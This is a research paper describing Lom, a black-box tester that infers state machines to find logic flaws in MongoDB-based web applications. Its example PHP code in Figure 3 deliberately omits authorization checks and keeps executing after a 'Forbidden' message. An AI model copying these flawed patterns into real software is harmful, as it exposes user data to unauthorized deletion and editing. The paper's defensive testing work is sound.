1 Institute of Machine Intelligence, College of Computer and Control Engineering, Nankai University, Tianjin 300350, China
2 Department of Electrical Engineering and Computer Science, Vanderbilt University, Nashville, Tennessee 37212, United States
3 Centre for Creative Computing, Bath Spa University, Bath, BA2 9BN, United Kingdom
4 School of Information Science and Electrical Engineering, Shandong Jiaotong University, Jinan 250357, China

Abstract: Logic flaws within web applications allow malicious operations to be triggered towards the back-end database. Existing approaches to identifying logic flaws in database accesses are strongly tied to SQL statement construction and cannot be applied to the new generation of web applications that use NoSQL databases as the storage tier. In this paper, we present Lom, a black-box approach for discovering many categories of logic flaws within MongoDB-based web applications. Our approach introduces a MongoDB operation model to support the new features of MongoDB and models the application logic as a Mealy finite state machine.
During the testing phase, test inputs which emulate state violation attacks are constructed for identifying logic flaws at each application state. We apply Lom to several MongoDB-based web applications and demonstrate its effectiveness. Keywords: Logic Flaw, Web Application Security, MongoDB. 1 Introduction Web applications have become a major information access portal in recent years. These applications interact with back-end databases on behalf of their users. The back-end database executes all the operations requested by the web application with the application's privileges, and therefore the application is responsible for ensuring that security checks take effect before the database accepts an operation. Web applications have thus become one of the primary targets for maliciously acquiring or manipulating the sensitive information in back-end databases. One category of attacks exploits the application’s input validation mechanisms, which may allow malformed user inputs to be used for constructing database operations, e.g., SQL queries. The notorious SQL injection belongs to this type. Another category of attacks, referred to as state violation attacks[1], exploits logic flaws within the application. This type of attack misleads the application into issuing database operations at incorrect application states. In contrast to input validation vulnerabilities, which have received considerable attention, only limited work has been presented to address logic flaws. The key challenge comes from the fact that logic vulnerabilities are specific to the intended functionality of a particular web application; hence, general approaches that can be applied to all web applications require an automated way of deriving the application’s intended logic or specification. On the other hand, NoSQL databases are increasingly being employed as an alternative to traditional SQL databases.
Their notable characteristics, such as flexible data models and scalable data storage, nicely support the needs of web applications whose workloads are massive and whose data sources may not have a predefined structure. Such flexibility, however, also brings a higher risk of logic vulnerabilities into web applications. However, to the best of our knowledge, no previous work has made efforts to address logic flaws in web applications with a NoSQL database as a backend. In this paper, we present Lom, the first systematic black-box approach which discovers logic flaws of database access within MongoDB-based web applications. The reason why we choose MongoDB is twofold: (1) According to the DB-Engines Ranking[2], MongoDB ranks first in popularity among all NoSQL databases. (2) As far as data modeling is concerned, MongoDB, which has a complicated hierarchical data model, is a representative NoSQL database. Although a few existing solutions aim to address logic vulnerabilities within web applications, the characteristics of MongoDB make their approaches inapplicable to MongoDB-based web applications: (1) Identical MongoDB operations represented in distinct programming languages have various appearances; previous static analysis approaches[3, 4, 5], which can only address SQL queries with fixed patterns or specific languages, cannot handle the diversified MongoDB operation appearances across multiple programming languages. (2) Some black-box approaches[6, 7], which can only target the flat data model of relational databases, are not appropriate for the hierarchical and flexible data model of MongoDB. (3) Many static techniques[3, 5] require the source code of applications for analysis, or can only be applied to specific web development languages and platforms[5, 8]. (4) A few approaches[6] need access to server-side session information.
(5) Some previous approaches[8, 9, 10] can address only one specific vulnerability and cannot be easily extended to handle other forms of logic flaws. By contrast, our approach supports the features of MongoDB. We explore the protocol layer to extract the MongoDB operation regardless of the programming language and introduce MPath, an XPath-like representation to locate each value in the hierarchical model within the MongoDB operation. In addition, our technique is designed to be general and to cover many kinds of logic vulnerabilities. The logic of a web application is modeled by a Mealy finite state machine[11] (Mealy FSM). To discover logic vulnerabilities, the intended state machine is first built as a partial state machine over the expected user inputs (MongoDB operations) observed when users follow the navigation paths within the web application. After that, on the basis of the inferred intended Mealy machine, we generate unexpected test inputs to exploit logic vulnerabilities within the application. These test inputs are related to three categories of attacks. After producing the test inputs, we send the test web requests to the web application and evaluate the outputs to discover potential logic flaws. Our contributions are summarized as follows: - We present a novel black-box approach for discovering logic vulnerabilities within MongoDB-based web applications. In particular, by observing the messages in the protocol layer, our approach introduces a MongoDB operation model to represent the MongoDB actions triggered within the web application. We characterize the logic flaws over the Mealy FSM, systematically utilize the observed user inputs for deriving the specification and generate test inputs to exploit vulnerabilities. - Our approach is able to cover numerous categories of logic flaws without the need for application source code or server-side session information, and can therefore support different coding languages and environments.
- We implemented a prototype system, Lom, and demonstrate that Lom can be used to identify logic flaws in today’s MongoDB-based web applications. The rest of this paper is organized as follows. We present our problem formulation in Section 3. Our approach and implementation are illustrated in detail in Section 4 and Section 5, respectively. Section 6 presents our experimental results. Finally, Section 2 discusses related work and the paper is concluded in Section 7. 2 Related Works To the best of our knowledge, only two existing studies address NoSQL database security. Okman et al.[13] analyze the main functionality and security features of two popular NoSQL databases, MongoDB and Cassandra. Aniello et al.[14] analyze the vulnerabilities of the gossip-based membership protocol used by Cassandra. Nonetheless, neither of these approaches concentrates on flaws within web applications built on NoSQL databases, whereas our approach detects logic flaws within modern MongoDB-based web applications. Most previous studies[10, 15, 16, 17] endeavor to exploit various vulnerabilities within web applications. For instance, SecuBat[18] is used to identify input validation vulnerabilities. Nevertheless, very few techniques address logic flaws within modern web applications. Two categories of approaches have been researched for securing legacy web applications from logic flaws: 1. **Vulnerability Analysis**: It tries to identify and fix the logic vulnerabilities within the applications. 2. **Attack Detection**: It tries to detect and block logic attacks launched against the vulnerable applications. The key issue common to both approaches is how to derive the application logic specification. The logic specification is then used for either attack detection or vulnerability analysis. A logic specification that is general to a number of web applications can be manually pre-specified.
Nemesis[19] aims at providing reliable authentication and authorization mechanisms for web applications. By modifying the language runtime, it can track users’ credentials and enforce pre-specified security policies over resources such as files and database objects. CLAMP[20] employs virtualization technology to isolate the application components for different users, so that the current user can only access his/her own data. More commonly, however, the logic specification is specific to each application and not available a priori. Swaddler[1], BLOCK[21] and SENTINEL[22] establish application-specific behavioral models and identify runtime deviations from the established model as potential logic attacks. In particular, SENTINEL focuses on securing the database access triggered by the web application based on a set of invariants extracted from execution traces. The objective of these works is to detect whether a given user input violates the application specification, while our objective is to effectively identify concrete inputs to the web application that violate the specification, which is much more challenging. Our work shares with a number of existing works the objective of identifying logic flaws within web applications. Swaddler[1], WAPTEC[3], RoleCast[4], Waler[5], Doupé et al.[8], Sun et al.[12], MiMoSA[22] and FixMeUp[23] infer the logic specification from application source code, through either static analysis or instrumentation. However, these techniques are language-dependent, and the spectrum of logic flaws they can deal with is limited by their capability of handling language details. For example, Waler[5] can only identify violations of value-related invariants in JSP web applications, which are inferred from dynamic executions. Sun et al.[12] assume a strong role lattice model for identifying access control flaws within PHP web applications. 
WAPTEC[3] collects the set of constraints along the paths leading to sensitive operations and constructs exploits to circumvent the security checks. Doupé et al.[8] specifically focus on Execution After Redirection vulnerabilities in Ruby web applications by analyzing control flows from application source code. In contrast, our approach extracts the MongoDB operation from the protocol layer without requiring source code, and can be utilized for all programming languages supported by MongoDB. Moreover, most of the above approaches target only one specific vulnerability and cannot easily be extended to handle other categories of logic flaws. Our technique is designed to be general and covers many kinds of logic vulnerabilities. Other techniques discover logic flaws within web applications without source code. For example, Doupé et al. [8] and NoTamper [9] address EAR vulnerabilities and parameter tampering, respectively. In comparison, our approach covers not only these two attacks but also the forceful browsing attack. InteGuard [24] and EUReCOM [25] attempt to secure multi-party web applications. LogicScope [26], SENTINEL [6] and BLOCK [21] make use of session information to construct application specifications. In comparison, our work does not require server-side session information from the application developers. Li et al. [7] propose an automated black-box technique for identifying access control vulnerabilities. Though SENTINEL [6] and the work of Li et al. [7] can be applied to traditional RDBMSs, they cannot handle the hierarchical and schema-less data model of MongoDB, which brings new challenges. Our technique supports these new features of MongoDB-backed web applications. Web applications are increasingly built with third-party web services through APIs and split between client side and server side, where logic vulnerabilities might arise. Wang et al. 
[27] discovered logic vulnerabilities within checkout procedures, which can be exploited by attackers to shop for free. Their follow-up work [28] also identified logic vulnerabilities within web-based single-sign-on services. InteGuard [24] performs security checks over a set of invariant relations among HTTP interactions to defeat logic attacks at runtime. INDICATOR [29] employs hybrid analysis to infer the dependency constraints on parameters for web services. Guha et al. [30] extract event graphs from client-side web applications and detect malicious client behaviors at runtime. Krishnamurthy [31] can be used to build secure web applications, where security policies specified by developers are automatically verified and enforced. Our technique focuses on logic vulnerabilities within server-side web applications and has the potential to be extended to handle the above scenarios. A number of testing tools, both open-source, e.g., Spike and Burp, and commercial, e.g., IBM AppScan, have been proposed for identifying input validation vulnerabilities within web applications [16]. They feed random inputs from a library of known attack patterns into applications. To improve testing coverage and efficiency, random fuzzing can be enhanced by guided test input generation [17, 32, 33]. None of these techniques can effectively handle logic vulnerabilities within web applications. 3 Problem Description 3.1 Background of MongoDB 3.1.1 The Data Model of MongoDB Document In MongoDB, the basic unit of data is the document, whose structure is hierarchical and non-relational. A document includes a set of field/value pairs, where the value of a field can itself be a document or an array, i.e., a list of values. Array elements can be any of the values supported for normal field/value pairs in MongoDB, including nested arrays and embedded documents. Figure 1 shows a document which employs embedded documents and array values. 
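Figure 1 itself is not reproduced here, but a document of the kind it describes can be sketched as a nested literal. The concrete field names and values below are hypothetical, modeled on the "$or/Number/$lt" example used later in Section 4.3.1:

```python
# Hypothetical MongoDB-style document illustrating the data model:
# the value of "$or" is an array, each array element is an embedded
# document, and "$lt" is MongoDB's "less than" comparison operator.
query_selector = {
    "$or": [
        {"Number": {"$lt": 100}},  # embedded document using an operator
        {"Name": "guest"},         # embedded document with a plain field
    ]
}
```

The same nesting may continue to arbitrary depth: arrays can hold embedded documents, which can in turn hold arrays.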
Collection MongoDB documents are grouped into one or more collections in a MongoDB database. The schema of a collection does not need to be defined when the collection is created, which gives users more data-modelling flexibility to match the design and performance requirements of an application. 3.1.2 MongoDB Wire Protocol MongoDB offers drivers for many programming languages, so that users can work in the language they are most proficient in. The same operation expressed in distinct drivers may look different. To abstract away these differences, we focus on the internals of how drivers access the MongoDB server. The drivers use the MongoDB Wire Protocol, a simple socket-based, request-response style and lightweight TCP/IP wire protocol, to let clients communicate with the MongoDB server through MongoDB request messages. A message defines the concrete data which an operation can access and the type of the operation. With these messages, update, delete, insert and read operations can be performed on MongoDB. 3.1.3 MongoDB Request Variable ```c
struct OP_UPDATE {
    MsgHeader header;             // standard message header
    int32     ZERO;               // reserved for future use (always 0)
    cstring   fullCollectionName; // "databaseName.collectionName"
    int32     flags;              // bit 0: Upsert; bit 1: MultiUpdate
    document  querySelector;      // to select the document
    document  updateDefinition;   // to specify the update to perform
}
``` Figure 2 shows the structure of one category of MongoDB request message (the update message). As can be seen from the figure, the data structures of the most useful variables in the MongoDB Wire Protocol, such as the query selector and the update definition, are documents. This structure is able to support complex commands. For instance, Figure 1 is also a MongoDB request variable (a query selector); there, “$lt” is the comparison operator corresponding to “less than”. Each of these document-structured variables is denoted as a MongoDB Request Variable in this paper. 
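Every wire-protocol message begins with a standard MsgHeader of four little-endian int32 fields; the legacy opcodes include 2001 (OP_UPDATE), 2002 (OP_INSERT), 2004 (OP_QUERY) and 2006 (OP_DELETE). A minimal sketch of packing and parsing this header (Python used purely for illustration):

```python
import struct

# Legacy MongoDB wire-protocol opcodes for the operation kinds above.
OP_UPDATE, OP_INSERT, OP_QUERY, OP_DELETE = 2001, 2002, 2004, 2006

def pack_header(message_length, request_id, response_to, op_code):
    # MsgHeader: messageLength, requestID, responseTo, opCode,
    # each a little-endian int32 (16 bytes total).
    return struct.pack("<iiii", message_length, request_id,
                       response_to, op_code)

def parse_header(data):
    length, req_id, resp_to, op = struct.unpack_from("<iiii", data, 0)
    return {"messageLength": length, "requestID": req_id,
            "responseTo": resp_to, "opCode": op}
```

A sniffer sitting on the MongoDB connection can read these 16 bytes first, learn the total message length and operation type, and then decode the BSON request variables that follow.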
Apparently, all the operation parameters are placed in these hierarchical and non-relational variables. ### 3.2 Logic Flaws within MongoDB-based Web Applications Figure 3 shows a simple vulnerable application that illustrates the logic vulnerabilities we concentrate on in our research. A logged-in user is first redirected to “index.php”. If the current user is an administrator, he can access links for adding new users and for editing and deleting any of the registered users. If the current user is a regular user, he can only browse the page for editing his personal information. We model a web application using a Mealy finite-state machine (Mealy FSM) model \((S, s_0, \Sigma, \Lambda, T, G)\), where \(S\) is the set of states, \(s_0 \in S\) is the initial state, \(\Sigma\) is the set of input symbols, \(\Lambda\) is the set of output symbols, \(T : S \times \Sigma \rightarrow S\) is the set of transition functions mapping pairs of a state and an input symbol to the corresponding next state, and \(G : S \times \Sigma \rightarrow \Lambda\) is the set of output functions mapping pairs of a state and an input symbol to the corresponding output symbol. To find the logic flaws within a web application, we need to analyze its two Mealy FSMs: 1. **Intended FSM** (denoted as \(F_1\)), which models the behavior of the originally planned web application without any logic flaws; 2. **Realistic FSM** (denoted as \(F_r\)), which models the behavior of the actual web application implemented by the developer. If \(F_r\) is equivalent to \(F_1\), the web application is regarded as secure. If disparities involving sensitive operations exist between \(F_r\) and \(F_1\), we conclude that the application has logic flaws. As illustrated in Figure 4, the example application has three states: the guest user who is not logged in \((s_0)\), the regular user \((s_1)\) and the administrator \((s_2)\). 
Each input symbol \(I \in \Sigma\) is an abstract representation of the triggered operation on back-end MongoDB (e.g., op1, op2 and op3 in Figure 3), and consists of two parts: 1. **Operation Contour** (denoted by \(C\)), which represents the contour of the operation (refer to Section 4.3.1 for details); 2. **Transmitted Parameter Mapping** (denoted by \(P\)), which represents both the parameters that can be transmitted from the web request to the operation and their related value sets (refer to Section 4.3.2 for details). Each output symbol in \(\Lambda\) is the acceptance of the operation by back-end MongoDB. The intended FSM \((F_1)\) for the application works as follows. At state \(s_1\), since it is intended that the regular user can only edit his personal information, when the regular user sends an input symbol \(I_1 = C_1 \cdot P_1\) in which the “userid” parameter equals the current user id, back-end MongoDB will accept this operation (output symbol \(O_1\)). When this user attempts to edit other users’ information, or to delete or add a user, i.e., sending \(I_2\) (\(I_2\) differs from \(I_1\) in its parameter mapping), \(I_3\) or \(I_4\), MongoDB will not accept or trigger the operation (output symbol \(O_2\)). Nonetheless, in this application there are three logic flaws, which are reflected as discrepancies between \(F_1\) and \(F_r\). First, “editUser.php” fails to check whether the “userid” parameter matches the current user’s information. Second, although “delUser.php” checks whether the current user is an administrator and appears, from the web response, to reject the operation, it does not end the application execution, so the back-end MongoDB operation is still triggered. Third, “addUser.php” does not check whether the current user has the admin privilege. These vulnerabilities allow three types of attacks: 1. 
**Parameter Manipulation Attack**: When \(I_2\) is sent to the application at state \(s_1\), \(O_1\) is returned, which means a regular user can edit other users’ information. 2. **Execution After Redirection (EAR) Attack** [8]: When \(I_3\) is sent to the application at state \(s_1\), \(O_3\) is returned, which means a regular user can still make back-end MongoDB delete other users’ information even though \(O_2\) appears to be returned in the web response. 3. **Forceful Browsing Attack**: When \(I_4\) is sent to the application at state \(s_1\), \(O_4\) is returned, which means a regular user can add new users. All the attacks mentioned above are common attacks targeting different kinds of logic vulnerabilities within database-based web applications. The EAR attack is especially challenging because it appears to be defended against in the web response, yet the back-end database still executes a database operation that was never meant to run. At a given state \(s\), only a subset of input symbols are expected by the application (denoted as \(\Sigma_{exp}(s)\)) and processed to produce normal output symbols, i.e., \(\Lambda_{nor}(s) = G(s, \Sigma_{exp}(s))\). The expected input symbols are the MongoDB operations triggered when the user follows the navigation links of the web application. The normal output symbols mean that MongoDB accepts the expected MongoDB operations. All other input symbols, which are not expected at state \(s\), should not trigger any MongoDB operation, resulting in blank output symbols. A blank output symbol means that the application refuses to accept the operation and therefore back-end MongoDB does not execute anything. As shown in Figure 4, for state \(s_1\), the expected input set is \(\{I_1\}\), and the normal output set and the blank output set are \(\{O_1\}\) and \(\{O_2\}\), respectively. For state \(s_2\), the expected input set is \(\{I_1, I_2, I_3, I_4\}\) and the normal output set is \(\{O_1, O_3, O_4\}\). 
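The per-state bookkeeping above can be sketched as a toy encoding of the example application's FSM (the symbol names follow the text; everything else is hypothetical):

```python
# Expected input symbols per state (Sigma_exp) and the normal outputs G
# for the example application; any input not listed for a state should
# map to the blank output in the intended FSM.
BLANK = "O2"  # blank output symbol, following the text's convention

expected = {
    "s1": {"I1"},
    "s2": {"I1", "I2", "I3", "I4"},
}
normal_output = {
    ("s1", "I1"): "O1",
    ("s2", "I1"): "O1", ("s2", "I2"): "O1",
    ("s2", "I3"): "O3", ("s2", "I4"): "O4",
}

def intended_output(state, symbol):
    """Output of the intended FSM: normal for expected inputs, else blank."""
    return normal_output.get((state, symbol), BLANK)

def unexpected_candidates(state, other_state):
    """Inputs expected at other_state but not at state -- the candidates
    used later (Section 4.4) for forceful-browsing/EAR test generation."""
    return expected[other_state] - expected[state]
```

A logic flaw manifests exactly when the real application returns a non-blank output where `intended_output` would return `BLANK`.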
The behaviors of \(F_1\) and \(F_r\) over the expected input symbols should be consistent, because the web application aims at implementing all the intended functionalities. Nevertheless, there may be unexpected inputs that are accepted by \(F_r\). Therefore, if an input symbol that is not expected at state \(s\) can be transmitted into the application and triggered on MongoDB, so that MongoDB generates an output symbol falling outside the blank output set, we recognize that the web application has a logic vulnerability at state \(s\). The related input symbol is defined as a malicious input symbol \(I_{\text{mal}}\).

index.php

```php
<?php
if ($_SESSION['privilege'] == "admin") {
    foreach ($alluser as $eachuser) {
        echo "<a href=\"delUser.php?userid=" . $eachuser . "\">Delete</a>";
        echo "<a href=\"editUser.php?userid=" . $eachuser . "\">Edit</a>";
    }
    echo "<a href=\"addUser.php\">Add</a>";
} else if ($_SESSION['privilege'] == "commonuser") {
    echo "<a href=\"editUser.php?userid=" . $_SESSION['userid'] . "\">Edit</a>";
}
// ......
?>
```

delUser.php

```php
<?php
if ($_SESSION['privilege'] != "admin")
    echo("Forbidden access."); // does not terminate execution
// op2
require('dbconnection.php');
$mongo = DBConnection::instance();
$collection = $mongo->getCollection('users');
$Id = $_GET['userid'];
$collection->remove(array('_id' => new MongoId($Id)));
?>
```

editUser.php

```php
<?php
// op1
require('dbconnection.php');
$mongo = DBConnection::instance();
$collection = $mongo->getCollection('users');
$Id = $_GET['userid'];
$User = array();
$User['name'] = $_POST['name'];
$User['password'] = $_POST['pwd'];
$collection->update(array('_id' => new MongoId($Id)), $User);
?>
```

Figure 3 Example Application

Figure 4 FSM Representation of Figure 3. (States: \(s_0\), \(s_1\), \(s_2\). Input symbols: \(I_1 = C_{op1} \cdot P[userid : v_{con}]\), \(I_2 = C_{op1} \cdot P[userid : v_{ncon}]\), \(I_3 = C_{op2} \cdot P[userid : notnull]\), \(I_4 = C_{op3} \cdot P[\,]\). Output symbols: \(O_1\): update operation is accepted; \(O_2\): blank (operation is not accepted); \(O_3\): delete operation is accepted; \(O_4\): insert operation is accepted.)

4 Approach 4.1 Approach Overview As mentioned in Section 3.2, we need to construct malicious inputs and verify their outputs at each state. This is a challenging task because we know nothing in advance about the entire input symbol set or the unexpected input symbol set at each state, and because some malicious inputs, e.g., EAR attacks, can modify the data in back-end MongoDB covertly without affecting the intended web responses. To symbolize the inputs, we need to understand the operations over MongoDB (Section 4.2). Two characteristics of MongoDB make this understanding more sophisticated: 1. As illustrated in Section 3.1.2, the same MongoDB operation may be expressed differently in different programming languages and, moreover, an operation may be characterized by several statements in the source code (such as op1, op2 or op3 in Figure 3). Hence we utilize dynamic analysis rather than static analysis, so that our approach is not constrained to a specific programming language or driver. We look into the protocol layer, which is the underlying unification of the distinct drivers, to extract the MongoDB operation no matter which programming language the application is written in. 2. As Section 3.1.3 shows, the basic data model of MongoDB, which is also used in the MongoDB request variable, is hierarchical and non-relational. MongoDB request variables are the most important components of MongoDB request messages, so we need to locate each field/value pair in the hierarchical data model. We present MPath to support this nested data structure. Our approach first builds a partial Mealy FSM over the expected input domain by leveraging the collected traces. 
For each application, we identify the user privileges and model each privilege as a state. Normal users’ traces are collected for different users at each state. The traces we collect include web requests/responses and MongoDB requests/responses from the protocol layer. The traces are symbolized as follows: 1. Input symbolization (Section 4.3), in which we abstract concrete MongoDB operations into input symbols to profile the expected input domain at each state, i.e., \( \Sigma_{\text{exp}}(s), \forall s \in S \); 2. Output symbolization, in which we observe whether MongoDB accepts the operations or not, in order to generate the output symbols and the mappings between the expected inputs and normal output symbols, i.e., \( G(\cdot, \Sigma_{\text{exp}}(\cdot)) \rightarrow \Lambda_{\text{nor}}(\cdot), \forall s \in S \). Application state transitions and the corresponding input symbols that trigger the transitions are also observed in this phase, i.e., \( T : S \times \Sigma \rightarrow S \). After the inference of the partial FSM, we leverage this inferred FSM to construct unexpected inputs at each application state (Section 4.4) and test the application. Output symbols are then evaluated to discover potential logic flaws (Section 4.5). 4.2 MongoDB Operation Analysis A MongoDB operation corresponds to a read, delete, update or insert message in the MongoDB Wire Protocol. It can read or modify the records in MongoDB. We extract the kernel information (message/operation type, collection name and the MongoDB request variables) of a message as its MongoDB operation, which represents the execution on MongoDB performed by the user through the web application. 4.3 Input Symbolization Given a set of MongoDB operations, we need to represent them with a finite number of input symbols. We symbolize each MongoDB operation with a two-part structure, i.e., the operation contour and the transmitted parameter mapping. 
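The MPath representation mentioned in Section 4.1 can be previewed with a small sketch (Python, with hypothetical helper names): a hierarchical request variable is flattened into XPath-like path/value pairs, and the set of paths, stripped of values, serves as a structural fingerprint.

```python
# Sketch of flattening a MongoDB request variable into MPath/value pairs.
# Dict keys extend the path; array elements are traversed under the same
# prefix, so the "$lt" below receives the MPath "$or/Number/$lt".
def mpaths(variable, prefix=""):
    pairs = []
    if isinstance(variable, dict):
        for key, value in variable.items():
            pairs += mpaths(value, prefix + "/" + key if prefix else key)
    elif isinstance(variable, list):
        for element in variable:
            pairs += mpaths(element, prefix)
    else:
        pairs.append((prefix, variable))
    return pairs

def structure(variable):
    """The variable's set of MPaths with parameter values removed."""
    return tuple(sorted(path for path, _ in mpaths(variable)))
```

Two request variables that differ only in their parameter values then yield the same `structure(...)` tuple, which is exactly what grouping operations by contour requires.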
4.3.1 Variable/Operation Contour MPath and Variable Contour Since MongoDB request variables are included in MongoDB operations, all the MongoDB request variables in the operations need to be stored in a reasonable form. The main challenge is how to model all of these variables efficiently for convenient comparison, i.e., how to locate each parameter easily. To locate each parameter, we introduce MPath, an analogue of XPath. As an example, the “$lt” parameter of Figure 1 can be expressed as “$or/Number/$lt”. With this kind of effective representation, we can express the original hierarchical MongoDB request variable. We then define the Contour of a MongoDB request variable as the variable without any parameter values. Each original variable is represented by its extracted contour and its parameter value set. For instance, the contour of Figure 1 can be represented as in Figure 5, where “p1” and “p2” represent the values of the related parameters. The top of the figure is the document view of the contour and the bottom is the MPath view, which is the implementation. Both the contour and the parameter set are derived from the original variable. Operation Contour The operation type, collection name and variable contours of a MongoDB operation are denoted as its operation contour. Similarly, each operation is represented by its contour and its parameter value set. 4.3.2 Transmitted Parameter Mapping We group all MongoDB operations based on their contours as well as the kernels of their respective web requests. A web request kernel includes the HTTP method and the request URL path without URL parameters. Each group is denoted as an Operation Group. For a MongoDB operation mo and its related web request wr, we denote a web request parameter of wr as \( p_{wr} \) with value \( v_{wr} \), and a MongoDB operation parameter of mo as \( p_{mo} \) with value \( v_{mo} \). 
If there exist \( p_{wr} \) and \( p_{mo} \) such that \( v_{wr} = v_{mo} \) holds for all MongoDB operations and web requests within the same operation group, we say there is a Parameter Transmission Path from $p_{wr}$ to $p_{mo}$, and denote $p_{wr}$ and its related value set $V_{p_{wr}}$ as a Transmitted Parameter Mapping. 4.3.3 Symbolization We first profile each transmitted parameter mapping and construct this part based on its related value set, i.e., the values of all transmitted parameters, because a parameter may take an unbounded number of values. The characterization of each value domain is a two-step process. The constraints between the parameter value set and the specific state, i.e., privilege, are extracted first by profiling each parameter at each state. For each state, the value set collected for each parameter within the same operation group is used to classify the parameter into three categories: 1. Random Parameter (denoted as $para_r$): The value set of this type of parameter has no limitation. Its value domain is represented with two values: null and notnull. 2. Unbounded Constrained Parameter (denoted as $para_{uc}$): The value set of this type of parameter is infinite but affected by certain constraints. We focus on single privilege-related constraints in this paper, which means the parameter value is always specific to each user under this state (e.g., the value of “userid” of “editUser.php” at $s_1$ in Figure 3 is particular to each user under $s_1$). Its value domain is represented with three kinds of values: null, $v_{con}$ and $v_{ncon}$, where $v_{con}$ denotes a value satisfying a constraint linked to a specific user under this state and $v_{ncon}$ denotes any other value. 3. Bounded Parameter (denoted as $para_b$): We represent its value domain with the value set and two kinds of values: null and $v_{outb}$, where $v_{outb}$ denotes the values outside the bounded set. 
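One way to realize this three-way classification, given the values observed for a parameter at one state grouped per user, is sketched below (the threshold and function names are hypothetical; the paper does not fix them):

```python
# Heuristic classification of a parameter's value domain at one state.
# values_per_user maps each user to the set of values observed for the
# parameter; bound_limit is an assumed cut-off for "bounded" sets.
def classify(values_per_user, bound_limit=5):
    all_values = {v for vs in values_per_user.values() for v in vs}
    if len(all_values) <= bound_limit:
        return "para_b"    # bounded: small closed value set
    if all(len(vs) == 1 for vs in values_per_user.values()):
        return "para_uc"   # one fixed value per user: privilege-constrained
    return "para_r"        # random: no observable limitation
```

For example, a boolean-like flag falls into the bounded class, a per-user id into the unbounded constrained class, and a free-text field into the random class.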
We then aggregate all the per-state views of the parameter value domains into a macroscopic view. If the value domain type of a parameter is consistent across all states, its domain type is kept and its value domain is recomputed. For $para_{uc}$, the updated value domain is the value set divided by the constraints. For $para_b$, its value domain absorbs the additional values. If the value domain types of the parameter differ across states, the more restrictive type (the strictness order is defined as $para_r < para_{uc} < para_b$) is adopted and its value domain is divided accordingly. For instance, the parameter “userid” of “editUser.php” in Figure 3 is constrained to the specific user at $s_1$, but inferred as a $para_r$ at $s_2$. So its macroscopic type will be $para_{uc}$ and two input symbols are produced at $s_2$, i.e., $C_1 \cdot P_1$ and $C_1 \cdot P_2$. 4.4 Test Input Symbol Generation As Figure 6 illustrates, two methods are designed for generating test input symbols at a given state $s$. 4.4.1 Parameter Manipulation For an expected input symbol $I = C \cdot P \in \Sigma_{exp}(s)$ at state $s$, we manipulate $P$ directly, i.e., the values of one or more parameters are changed so that the tampered input symbol is not included in the expected input set at state $s$. For an unbounded constrained parameter, we modify its value from $v_{con}$ to $v_{ncon}$. For a bounded parameter, its value is changed to another value in the bounded set or to $v_{outb}$. The left of Figure 6 shows an example: $P_1$ of input symbol $I_1$ is manipulated to generate a test input $I_{mal}$ for $s_1$. This method exhibits parameter manipulation attacks, where parameter values are manipulated to violate the constraints between operations and the current state. 4.4.2 Forceful Browsing/Execution After Redirection We observe another state $s'$ which has one or more expected input symbols excluded from the expected input set of the current state $s$. 
Input symbols at $s'$ whose operation contours are not included in the expected input symbol set of state $s$ are chosen as test input symbols for $s$, i.e., $I_{mal} \in \Sigma_{exp}(s') \setminus \Sigma_{exp}(s)$. The right of Figure 6 shows an example: the input symbols at state $s_2$ with $C_1$ and $C_2$ are selected as test inputs for state $s_1$, since they are not included at $s_1$. This method exhibits two types of attacks: 1. Forceful Browsing Attacks: One or more hidden sensitive links that should not be accessible at the current state can be forcefully browsed; 2. Execution After Redirection (EAR) Attacks: The attacker appears to be blocked by the application, judging from the web response of the page, but the sensitive MongoDB operations related to the page can still be successfully run on back-end MongoDB. These EAR attacks, which only manipulate the data stored in MongoDB, violate the state covertly. 4.5 Output Evaluation We denote the output symbol generated after the test input $I_{mal}$ is delivered into the application at state $s$ as $O_{test}$. The output evaluation determines whether $O_{test}$ belongs to the blank output set. Since a blank output symbol means that the application refuses to accept the operation, if back-end MongoDB triggers the operation of the test input, $O_{test}$ falls outside the blank output set. We collect the traces during testing. After all the test inputs are delivered and the traces are gathered, we analyze each interaction in the traces to examine whether each test operation has been triggered or not. If a test operation is performed, we recognize its related test input as a potential logic flaw. 5 Implementation We implement a prototype system Lom for discovering logic vulnerabilities within MongoDB-based web applications. As Figure 7 shows, Lom has three major components: Trace Collector, Specification Analyzer and Testing Engine. 
These components correspond to three phases: trace collection, specification inference and testing. 5.1 Phase I: Trace Collection Trace Collector collects the communication between the web application / MongoDB and the client while users navigate through the application during attack-free sessions; it is implemented in our research on top of the open-source network protocol analyzer Wireshark. 5.2 Phase II: Specification Inference Specification Analyzer is executed in Phase II to derive both the partial Mealy FSM and the testing specification. Symbolizer first transforms the traces collected in Phase I into symbolized session logs. Then the session logs are used by the Mealy FSM Analyzer module to derive the partial FSM, resulting in two files: StateProfile, which characterizes the mapping between input/output symbols at each state, and DriverSpec, which records the transitions between the application states as well as the input symbols that trigger the transitions. Finally, StateProfile is analyzed by TestSpec Generator to generate the testing specification, which includes both a set of test input symbols for each state and their related output symbols for evaluation. 5.3 Phase III: Testing Testing Engine is executed in Phase III to test whether the application has logic vulnerabilities, based on the derived profiles and specifications. It produces test web requests from test inputs (by Web Request Generator), delivers them to the application and evaluates the test traces for logic flaw identification (by Output Evaluator). Testing Controller is the core module that takes charge of the entire testing procedure. It first loads TestSpec and the other profiles and checks the current application state. If the test of the current state is not completed, it retrieves the next available test input symbol, delegates Request Generator to generate a concrete web request and submits it to the application. 
After it receives the web response, it wraps up all the necessary information and sends it to Output Evaluator for evaluation, where logic vulnerabilities, if any exist, are reported. If the test of the current state is completed, i.e., no test inputs are left, Testing Controller moves to the next available test state. It consults State Driver, which loads DriverSpec and keeps track of the transition graph of the application, to get the path leading to the next test state. The path computed by State Driver is essentially the shortest path from the current state to the target state (i.e., a sequence with the minimum number of input symbols), which is instantiated by Request Generator and triggers the state transitions step by step toward the target state. This mechanism is needed because we cannot directly drive the application into a desired abstract state. For the example application, after we have tested state s1 for the regular user, we have to first log out (i.e., move to state s0) and log in as an administrator to test state s2. If all the states have been fully tested, the testing procedure is finished. One key challenge we need to address is how to instantiate abstract input symbols into concrete web requests with meaningful parameters. In Phase II, when we profile web requests, we also infer the value type (e.g., number, literal string) of each parameter. When Request Generator tries to generate the concrete value for a parameter, it checks the parameter’s value type and randomly generates a value of that type or retrieves a value from a pre-loaded value store (i.e., InputProfile). In particular, Request Generator includes the Login Helper module, which helps Testing Engine successfully log into the application. 
